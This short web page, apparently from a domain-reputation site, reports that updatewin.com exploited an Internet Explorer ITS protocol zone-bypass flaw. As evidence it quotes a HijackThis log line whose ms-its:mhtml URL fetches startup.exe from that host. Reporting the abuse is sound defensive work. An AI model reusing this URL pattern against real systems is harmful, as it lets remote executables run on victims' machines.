updatewin.com seems to have been exploiting the Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability, based on the following Hijackthis log entry:
O16 - DPF: {11010101-1001-1111-1000-115676576811} - ms-its:mhtml:file://c:\nosuch.mht!http://updatewin.com/buy/var.chm::/startup.exe
Koffix offers you the possibility to:
The information about updatewin.com is licensed under Creative Commons Attribution 2.5 License.